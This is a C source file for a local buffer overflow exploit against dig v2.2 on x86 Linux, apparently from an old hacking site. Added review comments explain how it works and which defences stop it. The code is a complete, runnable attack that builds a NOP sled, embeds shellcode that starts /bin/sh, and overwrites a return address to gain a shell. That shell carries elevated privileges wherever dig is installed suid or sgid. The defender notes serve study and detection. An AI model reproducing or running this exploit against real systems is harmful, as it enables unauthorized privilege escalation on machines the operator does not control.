Local buffer overflow exploit for dig v2.2 on x86 Linux. Note that dig is installed suid/sgid on some platforms but not on others; the overflow only crosses a privilege boundary where it is.
64d48db2681ea2a2b39db0e4c5ed0534
/*
private
dig v2.2 local exploit example for linux/x86
note that dig isn't suid/sgid on some platforms, yet on some it is.
- anathema <anathema@hack.co.za>
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
/*
 * Proof-of-concept driver: builds one argument of roughly 9 KB (padding, an
 * embedded payload, then a 4-byte address) and replaces the current process
 * with /usr/bin/dig, passing that argument.
 *
 * NOTE(review): the vulnerable code in dig is not shown here. The size and
 * layout of the argument suggest that dig v2.2 copies a command-line argument
 * into a smaller stack buffer without a length check -- confirm against the
 * dig source.
 *
 * Defender notes:
 *  - Per the header, impact depends on dig carrying suid/sgid bits; auditing
 *    for and removing those bits removes the privilege gain.
 *  - The resulting execve has a distinctive shape: a single multi-kilobyte
 *    argument to dig consisting mostly of 0x90 bytes. A name to look up is
 *    never that long, so argument length alone is a usable detection signal.
 *  - The address written at the end is a guess derived from this process's own
 *    stack, and the payload presumably runs from the stack. Stack address
 *    randomisation and non-executable stacks are designed to break both
 *    assumptions.
 *
 * argc and argv are unused. Nothing is returned explicitly; on success execl
 * does not return.
 */
main(int argc, char **argv)
{
/* Staging area for the single argument handed to dig. */
char buf[9500];
/* offset is a fixed adjustment added to the stack address taken below. */
int i,offset=2000;
/*
 * Opaque machine-code bytes followed by the string "/bin/sh". Per the header
 * this targets linux/x86; presumably it starts a shell -- not verified here.
 */
char shellc[] =
"\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89\x46\x0c\x89\x76\x08\xb0\x0b"
"\x87\xf3\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29\xc0\x40\xcd\x80\xe8"
"\xde\xff\xff\xff/bin/sh";
/*
 * Stores the address of this local as an integer (pointer-to-integer
 * conversion with no cast), then shifts it by offset. The result is a guessed
 * stack address, not a value read from the target.
 */
long addr=&addr;
addr+=offset;
/* Fill the leading part of buf with 0x90, the single-byte NOP opcode on x86. */
memset(buf, 0x90, 9087-strlen(shellc));
/*
 * Place the payload directly after the padding. The loop runs sizeof(shellc)
 * times, so it also copies the terminating NUL, which lands at buf[9087] and
 * is replaced by the low address byte below.
 */
for(i=0;i < sizeof(shellc);i++) buf[i+9087-strlen(shellc)] = shellc[i];
/*
 * Write the guessed address into buf[9087..9090], least-significant byte at
 * the lowest index (x86 little-endian order). The masks cover only the low
 * 32 bits of addr.
 */
buf[9090] = (addr & 0xff000000) >> 24;
buf[9089] = (addr & 0x00ff0000) >> 16;
buf[9088] = (addr & 0x0000ff00) >> 8;
buf[9087] = (addr & 0x000000ff);
/* Replace this process with dig, passing buf as its only argument. */
execl("/usr/bin/dig", "dig", buf, NULL);
}
/* private */
/* www.hack.co.za */